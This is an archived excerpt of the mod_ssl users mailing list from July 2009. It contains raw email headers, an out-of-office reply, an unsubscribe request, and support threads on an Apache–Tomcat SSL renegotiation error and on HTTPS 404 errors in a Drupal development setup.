User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 17 16:03:09 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CBBC714DA59; Fri, 17 Jul 2009 16:03:09 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (mail2.aspaway.fr [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id 7123E14DA3E
	for ; Fri, 17 Jul 2009 16:02:45 +0200 (CEST)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com (frfcqws071ix328 [10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11.20060308/8.12.11) with ESMTP id n6HE1Cp4001077
	for ; Fri, 17 Jul 2009 16:01:13 +0200
Subject: Jean-Pierre Guilloteau est absent.
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 17 Jul 2009 16:01:11 +0200
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(Release 7.0.2|September 26, 2006) at
 07/17/2009 04:01:13 PM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting Sat 27/06/09 and will not return until
Mon 20/07/09.

I will respond to your message when I return.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 17 16:15:47 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 60EC314DA3C; Fri, 17 Jul 2009 16:15:47 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from QMTA02.westchester.pa.mail.comcast.net (qmta02.westchester.pa.mail.comcast.net [76.96.62.24])
	by master.modssl.org (Postfix) with ESMTP id 6472814D838
	for ; Fri, 17 Jul 2009 16:15:22 +0200 (CEST)
Received: from OMTA08.westchester.pa.mail.comcast.net ([76.96.62.12])
	by QMTA02.westchester.pa.mail.comcast.net with comcast
	id GzTN1c0020Fqzac522Drps; Fri, 17 Jul 2009 14:13:51 +0000
Received: from sz0093.wc.mail.comcast.net ([76.96.58.151])
	by OMTA08.westchester.pa.mail.comcast.net with comcast
	id H2Dr1c00F3FmDic3U2DrXd; Fri, 17 Jul 2009 14:13:51 +0000
Date: Fri, 17 Jul 2009 14:13:51 +0000 (UTC)
From: Lou Picciano 
To: modssl-users@modssl.org
Cc: iain.emsley@stfc.ac.uk
Message-ID: <89989569.2619131247840031310.JavaMail.root@sz0093a.westchester.pa.mail.comcast.net>
In-Reply-To: <681745404.2615171247839513929.JavaMail.root@sz0093a.westchester.pa.mail.comcast.net>
Subject: Re: SSL connection between Apache and Tomcat failing
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_127361_115640072.1247840031309"
X-Originating-IP: [68.37.107.119]
X-Mailer: Zimbra 5.0.16_GA_2927.RHEL5_64 (ZimbraWebClient - FF3.0 (Mac)/5.0.16_GA_2927.RHEL5_64)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lou Picciano 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_127361_115640072.1247840031309
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable

Iain:=20

Wow! Am I glad to hear from you! I've been wrestling with exactly this prob=
lem - error on: OpenSSL: read 5/5 bytes from BIO - for a few weeks now; was=
 beginning to think I was losing my mind. (while we leave that possibility =
aside for the moment(!),) here's what's different about our environment:=20

Apache/2.2.11 (Unix - Solaris SPARC) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.=
9 . We are using certificate authentication. Seeing this behavior under Fir=
efox (Mac); haven't tried it using mobile browsers, though, presumably, you=
 may be using a Mozilla-based mobile browser... We've recently upgraded to =
these current versions of Apache and OpenSSL, but the error behavior has no=
t been impacted. The incessant prompting for certificate can be interrupted=
 by setting Firefox's Advanced-Encryption-When a server requests my certifi=
cate-Select one automatically option. The above read error persists, howeve=
r...=20

The primary impact is - apparently - that the SSL session is constantly re-=
negotiated for GET of each page element; loading of a single page might gen=
erate 8-10 prompts for the certificate. We have fiddled with various settin=
gs for the Renogotiation buffer, including which buffer engine is used, its=
 size, etc., all to no avail. Some of the settings result in Apache configu=
ration errors, so I wonder if we're into an Apache - or mod_ssl - 'black ho=
le' region.=20

My quick research on this indicates that others have run into it, some have=
 simply ignored it, but none have solved it.=20

Hopefully we'll come up with something. Lou=20

----- Original Message -----=20
From: "I Emsley (Iain)" =20
To: modssl-users@modssl.org=20
Sent: Friday, July 17, 2009 8:56:23 AM GMT -05:00 US/Canada Eastern=20
Subject: SSL connection between Apache and Tomcat failing=20




I=E2=80=99ve got a website which uses Apache 2.2 as the front end with Tomc=
at 5.5.23 as the backend and am using mod_ssl and mod_proxy to link to the =
two together in Windows server 2003. Normally there isn=E2=80=99t an issue =
with two servers serving the website but recently (and mainly with , it app=
ears, mobile browsers), I=E2=80=99m getting the following errors:=20

i Jul 17 09:52:29 2009] [debug] ssl_engine_kernel.c(1760): OpenSSL: Loop: S=
SLv3 read finished A=20

[Fri Jul 17 09:52:29 2009] [debug] ssl_engine_kernel.c(1756): OpenSSL: Hand=
shake: done=20

[Fri Jul 17 09:52:29 2009] [info] Connection: Client IP: 130.246.76.83, Pro=
tocol: TLSv1, Cipher: DHE-RSA-AES256-SHA (256/256 bits)=20

[Fri Jul 17 09:52:29 2009] [debug] ssl_engine_io.c(1817): OpenSSL: read 5/5=
 bytes from BIO=20

------=_Part_127361_115640072.1247840031309
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable

<=
div style=3D'font-family: Arial; font-size: 12pt; color: #000000'>Iain:
=

Wow!  Am I glad to hear from you!  I've been wrestling with e=
xactly this problem - error on: OpenSSL: read 5/5 bytes from BIO - for a few wee=
ks now; was beginning to think I was losing my mind. (while we leave that p=
ossibility aside for the moment(!),) here's what's different about our envi=
ronment:

Apache/2.2.11 (Unix - Solaris SPARC) mod_ssl/2.2.11 O=
penSSL/0.9.8k PHP/5.2.9.  We are using certificate authenticati=
on. Seeing this behavior under Firefox (Mac); haven't tried it using mobile=
 browsers, though, presumably, you may be using a Mozilla-based mobile brow=
ser...  We've recently upgraded to these current versions of Apache an=
d OpenSSL, but the error behavior has not been impacted.  The incessan=
t prompting for certificate can be interrupted by setting Firefox's Advance=
d-Encryption-When a server requests my certificate-Select one automatically=
 option.  The above read error persists, however...

The primary=
 impact is - apparently - that the SSL session is constantly re-negotiated for GET of each page element; lo=
ading of a single page might generate 8-10 prompts for the certificate.&nbs=
p; We have fiddled with various settings for the Renogotiation buffer, incl=
uding which buffer engine is used, its size, etc., all to no avail.  S=
ome of the settings result in Apache configuration errors, so I wonder if w=
e're into an Apache - or mod_ssl - 'black hole' region.

My quick res=
earch on this indicates that others have run into it, some have simply igno=
red it, but none have solved it.

Hopefully we'll come up with someth=
ing.     Lou

----- Original Message -----
Fro=
m: "I Emsley (Iain)" <iain.emsley@stfc.ac.uk>
To: modssl-users@mod=
ssl.org
Sent: Friday, July 17, 2009 8:56:23 AM GMT -05:00 US/Canada East=
ern
Subject: SSL connection between Apache and Tomcat failing














I=E2=80=99ve got a website which uses Apache 2.2 as =
the front
end with Tomcat 5.5.23 as the backend and am using mod_ssl and mod_proxy to
link to the two together in Windows server 2003. Normally there isn=E2=80=
=99t an
issue with two servers serving the website but recently (and mainly with , =
it appears,
mobile browsers), I=E2=80=99m getting the following errors:



i Jul 17 09:52:29 2009] [debug] ssl_engine_kernel.c(=
1760):
OpenSSL: Loop: SSLv3 read finished A



[Fri Jul 17 09:52:29 2009] [debug]
ssl_engine_kernel.c(1756): OpenSSL: Handshake: done



[Fri Jul 17 09:52:29 2009] [info] Connection: Client=
 IP:
130.246.76.83, Protocol: TLSv1, Cipher: DHE-RSA-AES256-SHA (256/256 bits)


[Fri Jul 17 09:52:29 2009] [debug] ssl_engine_io.c(1=
817):
OpenSSL: read 5/5 bytes from BIO


------=_Part_127361_115640072.1247840031309--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 17 16:17:21 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 84DE314DA51; Fri, 17 Jul 2009 16:17:21 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.citigroup.com (mail4.ssmb.com [199.67.179.104])
	by master.modssl.org (Postfix) with ESMTP id 0521C14D838;
	Fri, 17 Jul 2009 16:16:56 +0200 (CEST)
Received: from imbarc-nj02.nj.ssmb.com (imbarc-nj02.nj.ssmb.com [150.110.177.216])
	by imbaspam-ny04.ssmb.com (8.13.8/8.13.8/SSMB_EXT/ev: 24741 $) with ESMTP id n6HEFOCn017817;
	Fri, 17 Jul 2009 14:15:25 GMT
Received: from mailhub-nj04-1.nj.ssmb.com (mailhub-nj04-2.nj.ssmb.com [150.110.236.237])
	by imbarc-nj02.nj.ssmb.com (8.13.8/8.13.8/SSMB_QQQ_IN/1.1) with ESMTP id n6HEFNo5015692;
	Fri, 17 Jul 2009 14:15:23 GMT
Received: from exlmdsm02.lac.nsroot.net (EXLMDSM02.lac.nsroot.net [169.193.142.75])
	by mailhub-nj04-1.nj.ssmb.com (8.13.8/8.13.8/CG_HUB) with ESMTP id n6HEFM6W010680;
	Fri, 17 Jul 2009 14:15:23 GMT
Received: from exlbrmb07.lac.nsroot.net ([169.167.113.8]) by exlmdsm02.lac.nsroot.net with Microsoft SMTPSVC(5.0.2195.6713);
	 Fri, 17 Jul 2009 10:15:22 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.0.6619.12
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01CA06E9.04566E8E"
Subject: Please remove my email from the list
Date: Fri, 17 Jul 2009 11:15:20 -0300
Message-ID: <61A49EACE4B520449427D0FF6DB5E7600813200B@exlbrmb07.lac.nsroot.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Please remove my email from the list
Thread-Index: AcoG6OYuhRmps2ZnRhmXa1nFShaJFgAAAkqg
References: <89989569.2619131247840031310.JavaMail.root@sz0093a.westchester.pa.mail.comcast.net>
From: "Tan, Liao " 
To: 
Cc: 
X-OriginalArrivalTime: 17 Jul 2009 14:15:22.0601 (UTC) FILETIME=[05AF6D90:01CA06E9]
X-Scanned-By: MIMEDefang 2.52 on 199.67.177.46
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tan, Liao " 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01CA06E9.04566E8E
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Please remove my email from the list
=20

------_=_NextPart_001_01CA06E9.04566E8E
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable









Please remove my=20
email from the list


 


------_=_NextPart_001_01CA06E9.04566E8E--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 19 21:40:23 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id ECC9514DA36; Sun, 19 Jul 2009 21:40:22 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from kuber.nabble.com (kuber.nabble.com [216.139.236.158])
	by master.modssl.org (Postfix) with ESMTP id 7C10614D838
	for ; Sun, 19 Jul 2009 21:39:58 +0200 (CEST)
Received: from isper.nabble.com ([192.168.236.156])
	by kuber.nabble.com with esmtp (Exim 4.63)
	(envelope-from )
	id 1MScDK-00077T-37
	for modssl-users@modssl.org; Sun, 19 Jul 2009 12:38:26 -0700
Message-ID: <24533884.post@talk.nabble.com>
Date: Sun, 19 Jul 2009 12:38:26 -0700 (PDT)
From: glowkeeper 
To: modssl-users@modssl.org
Subject: modssl - URL's under domain name not found
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: steve.huckle@gmail.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: glowkeeper 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I am running modssl under apache 2.2.11 on my development server using mac os
x 10.5.

I have created self signed certificates using openssl for this machine.

https://devel works just fine.

https://devel/directory generates a 404 file not found error.

https://devel/anotherdirectory/etcetc also generates a 404.

I have a very similar setup on a live server that's running Centos 5.1,
apache 2.2.3, modssl and an ssl certificate via Comodo. This is working just
fine - all URL's resolve properly.

I have tried copying the conf' files on the live and devel' server line for
line, but I don't seem to be able to overcome the error on my development
machine.

Does anyone have any idea what the problem on my development machine might
by? Any pointers would be welcome.....
-- 
View this message in context: http://www.nabble.com/modssl---URL%27s-under-domain-name-not-found-tp24533884p24533884.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 20 09:27:02 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 713A014DA25; Mon, 20 Jul 2009 09:27:02 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from nasa30.com (mail.net2b.de [212.105.204.244])
	by master.modssl.org (Postfix) with ESMTP id 99F0114D83F
	for ; Mon, 20 Jul 2009 09:26:37 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
Subject: RE: modssl - URL's under domain name not found
Date: Mon, 20 Jul 2009 09:23:48 +0200
Message-ID: 
In-Reply-To: <24533884.post@talk.nabble.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: modssl - URL's under domain name not found
Thread-Index: AcoIqG6O6wfF8d+1Si2Y24/FgHADaQAYoiog
References: <24533884.post@talk.nabble.com>
From: "Mario Brandt" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mario Brandt" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi!
What is in your error log about that?

Mario=20

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of glowkeeper
Sent: Sunday, July 19, 2009 9:38 PM
To: modssl-users@modssl.org
Subject: modssl - URL's under domain name not found


I am running modssl under apache 2.2.11 on my development server using
mac os x 10.5.

I have created self signed certificates using openssl for this machine.

https://devel works just fine.

https://devel/directory generates a 404 file not found error.

https://devel/anotherdirectory/etcetc also generates a 404.

I have a very similar setup on a live server that's running Centos 5.1,
apache 2.2.3, modssl and an ssl certificate via Comodo. This is working
just fine - all URL's resolve properly.

I have tried copying the conf' files on the live and devel' server line
for line, but I don't seem to be able to overcome the error on my
development machine.

Does anyone have any idea what the problem on my development machine
might by? Any pointers would be welcome.....
--
View this message in context:
http://www.nabble.com/modssl---URL%27s-under-domain-name-not-found-tp245
33884p24533884.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 20 10:54:47 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 070C314D9EE; Mon, 20 Jul 2009 10:54:47 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from kuber.nabble.com (kuber.nabble.com [216.139.236.158])
	by master.modssl.org (Postfix) with ESMTP id 01FE214D83F
	for ; Mon, 20 Jul 2009 10:54:17 +0200 (CEST)
Received: from isper.nabble.com ([192.168.236.156])
	by kuber.nabble.com with esmtp (Exim 4.63)
	(envelope-from )
	id 1MSoc1-0000xW-Qd
	for modssl-users@modssl.org; Mon, 20 Jul 2009 01:52:45 -0700
Message-ID: <24566061.post@talk.nabble.com>
Date: Mon, 20 Jul 2009 01:52:45 -0700 (PDT)
From: glowkeeper 
To: modssl-users@modssl.org
Subject: RE: modssl - URL's under domain name not found
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: steve.huckle@gmail.com
References: <24533884.post@talk.nabble.com> 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: glowkeeper 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


The error log says (for example):

[Mon Jul 20 09:40:21 2009] [error] [client 127.0.0.1] File does not exist:
/Library/WebServer/Documents/drupal/electric-heater-info, referer:
https://devel.cosyheart.com/

Actually, my original post is a bit misleading - the content is delivered
via drupal and a MySQL database, not from a filesystem. Furthermore, that
database is replicated between the devel' and live server (so they are
EXACTLY the same), and all works just fine under normal http. As I said, ssl
also works on the live server, but not on the dev machine (other than the
home page).


Mario Brandt wrote:
> 
> Hi!
> What is in your error log about that?
> 
> Mario 
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of glowkeeper
> Sent: Sunday, July 19, 2009 9:38 PM
> To: modssl-users@modssl.org
> Subject: modssl - URL's under domain name not found
> 
> 
> I am running modssl under apache 2.2.11 on my development server using
> mac os x 10.5.
> 
> I have created self signed certificates using openssl for this machine.
> 
> https://devel works just fine.
> 
> https://devel/directory generates a 404 file not found error.
> 
> https://devel/anotherdirectory/etcetc also generates a 404.
> 
> I have a very similar setup on a live server that's running Centos 5.1,
> apache 2.2.3, modssl and an ssl certificate via Comodo. This is working
> just fine - all URL's resolve properly.
> 
> I have tried copying the conf' files on the live and devel' server line
> for line, but I don't seem to be able to overcome the error on my
> development machine.
> 
> Does anyone have any idea what the problem on my development machine
> might by? Any pointers would be welcome.....
> --
> View this message in context:
> http://www.nabble.com/modssl---URL%27s-under-domain-name-not-found-tp245
> 33884p24533884.html
> Sent from the mod_ssl - Users mailing list archive at Nabble.com.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 

-- 
View this message in context: http://www.nabble.com/modssl---URL%27s-under-domain-name-not-found-tp24533884p24566061.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 20 10:58:51 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2B03414D9EE; Mon, 20 Jul 2009 10:58:51 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from nasa30.com (mail.tagueri.com [212.105.204.244])
	by master.modssl.org (Postfix) with ESMTP id D10F614D83F
	for ; Mon, 20 Jul 2009 10:58:26 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
Subject: RE: modssl - URL's under domain name not found
Date: Mon, 20 Jul 2009 10:55:38 +0200
Message-ID: 
In-Reply-To: <24566061.post@talk.nabble.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: modssl - URL's under domain name not found
Thread-Index: AcoJF2h1DSbLpR4/SfSxtrR8HvYABQAAEBBg
References: <24533884.post@talk.nabble.com>  <24566061.post@talk.nabble.com>
From: "Mario Brandt" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mario Brandt" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I guess the rewriting is not turned on in the SSL vhost. Else there
should be a rewriting to a php file which works with PATH_INFO

You may check that out.

Mario=20

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of glowkeeper
Sent: Monday, July 20, 2009 10:53 AM
To: modssl-users@modssl.org
Subject: RE: modssl - URL's under domain name not found


The error log says (for example):

[Mon Jul 20 09:40:21 2009] [error] [client 127.0.0.1] File does not
exist:
/Library/WebServer/Documents/drupal/electric-heater-info, referer:
https://devel.cosyheart.com/

Actually, my original post is a bit misleading - the content is
delivered via drupal and a MySQL database, not from a filesystem.
Furthermore, that database is replicated between the devel' and live
server (so they are EXACTLY the same), and all works just fine under
normal http. As I said, ssl also works on the live server, but not on
the dev machine (other than the home page).


Mario Brandt wrote:
>=20
> Hi!
> What is in your error log about that?
>=20
> Mario
>=20
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of glowkeeper
> Sent: Sunday, July 19, 2009 9:38 PM
> To: modssl-users@modssl.org
> Subject: modssl - URL's under domain name not found
>=20
>=20
> I am running modssl under apache 2.2.11 on my development server using

> mac os x 10.5.
>=20
> I have created self signed certificates using openssl for this
machine.
>=20
> https://devel works just fine.
>=20
> https://devel/directory generates a 404 file not found error.
>=20
> https://devel/anotherdirectory/etcetc also generates a 404.
>=20
> I have a very similar setup on a live server that's running Centos=20
> 5.1, apache 2.2.3, modssl and an ssl certificate via Comodo. This is=20
> working just fine - all URL's resolve properly.
>=20
> I have tried copying the conf' files on the live and devel' server=20
> line for line, but I don't seem to be able to overcome the error on my

> development machine.
>=20
> Does anyone have any idea what the problem on my development machine=20
> might by? Any pointers would be welcome.....
> --
> View this message in context:
> http://www.nabble.com/modssl---URL%27s-under-domain-name-not-found-tp2
> 45
> 33884p24533884.html
> Sent from the mod_ssl - Users mailing list archive at Nabble.com.
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20
>=20

--
View this message in context:
http://www.nabble.com/modssl---URL%27s-under-domain-name-not-found-tp245
33884p24566061.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 20 11:28:13 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D4D9214D9DB; Mon, 20 Jul 2009 11:28:13 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from kuber.nabble.com (kuber.nabble.com [216.139.236.158])
	by master.modssl.org (Postfix) with ESMTP id 44E1C14D83F
	for ; Mon, 20 Jul 2009 11:27:48 +0200 (CEST)
Received: from isper.nabble.com ([192.168.236.156])
	by kuber.nabble.com with esmtp (Exim 4.63)
	(envelope-from )
	id 1MSp8S-0002gW-VA
	for modssl-users@modssl.org; Mon, 20 Jul 2009 02:26:16 -0700
Message-ID: <24566482.post@talk.nabble.com>
Date: Mon, 20 Jul 2009 02:26:16 -0700 (PDT)
From: glowkeeper 
To: modssl-users@modssl.org
Subject: RE: modssl - URL's under domain name not found
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: steve.huckle@gmail.com
References: <24533884.post@talk.nabble.com>  <24566061.post@talk.nabble.com> 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: glowkeeper 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Sounds good - I have checked that I'm loading mod_rewrite.so and tried
"RewriteEngine On" in the ssl vhost on the dev machine - but that didn't
work. So what else do I need to check regarding? I'm also confused why it
should then be working on my live machine when the config' files are almost
identical...

I'm obviously missing something though :)


Mario Brandt wrote:
> 
> I guess the rewriting is not turned on in the SSL vhost. Else there
> should be a rewriting to a php file which works with PATH_INFO
> 
> You may check that out.
> 
> Mario 
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of glowkeeper
> Sent: Monday, July 20, 2009 10:53 AM
> To: modssl-users@modssl.org
> Subject: RE: modssl - URL's under domain name not found
> 
> 
> The error log says (for example):
> 
> [Mon Jul 20 09:40:21 2009] [error] [client 127.0.0.1] File does not
> exist:
> /Library/WebServer/Documents/drupal/electric-heater-info, referer:
> https://devel.cosyheart.com/
> 
> Actually, my original post is a bit misleading - the content is
> delivered via drupal and a MySQL database, not from a filesystem.
> Furthermore, that database is replicated between the devel' and live
> server (so they are EXACTLY the same), and all works just fine under
> normal http. As I said, ssl also works on the live server, but not on
> the dev machine (other than the home page).
> 
> 
> Mario Brandt wrote:
>> 
>> Hi!
>> What is in your error log about that?
>> 
>> Mario
>> 
>> -----Original Message-----
>> From: owner-modssl-users@modssl.org
>> [mailto:owner-modssl-users@modssl.org] On Behalf Of glowkeeper
>> Sent: Sunday, July 19, 2009 9:38 PM
>> To: modssl-users@modssl.org
>> Subject: modssl - URL's under domain name not found
>> 
>> 
>> I am running modssl under apache 2.2.11 on my development server using
> 
>> mac os x 10.5.
>> 
>> I have created self signed certificates using openssl for this
> machine.
>> 
>> https://devel works just fine.
>> 
>> https://devel/directory generates a 404 file not found error.
>> 
>> https://devel/anotherdirectory/etcetc also generates a 404.
>> 
>> I have a very similar setup on a live server that's running Centos 
>> 5.1, apache 2.2.3, modssl and an ssl certificate via Comodo. This is 
>> working just fine - all URL's resolve properly.
>> 
>> I have tried copying the conf' files on the live and devel' server 
>> line for line, but I don't seem to be able to overcome the error on my
> 
>> development machine.
>> 
>> Does anyone have any idea what the problem on my development machine 
>> might by? Any pointers would be welcome.....
>> --
>> View this message in context:
>> http://www.nabble.com/modssl---URL%27s-under-domain-name-not-found-tp2
>> 45
>> 33884p24533884.html
>> Sent from the mod_ssl - Users mailing list archive at Nabble.com.
>> 
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>> 
>> 
> 
> --
> View this message in context:
> http://www.nabble.com/modssl---URL%27s-under-domain-name-not-found-tp245
> 33884p24566061.html
> Sent from the mod_ssl - Users mailing list archive at Nabble.com.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 

-- 
View this message in context: http://www.nabble.com/modssl---URL%27s-under-domain-name-not-found-tp24533884p24566482.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 22 15:47:15 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A4AA314D9EE; Wed, 22 Jul 2009 15:47:15 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from kuber.nabble.com (kuber.nabble.com [216.139.236.158])
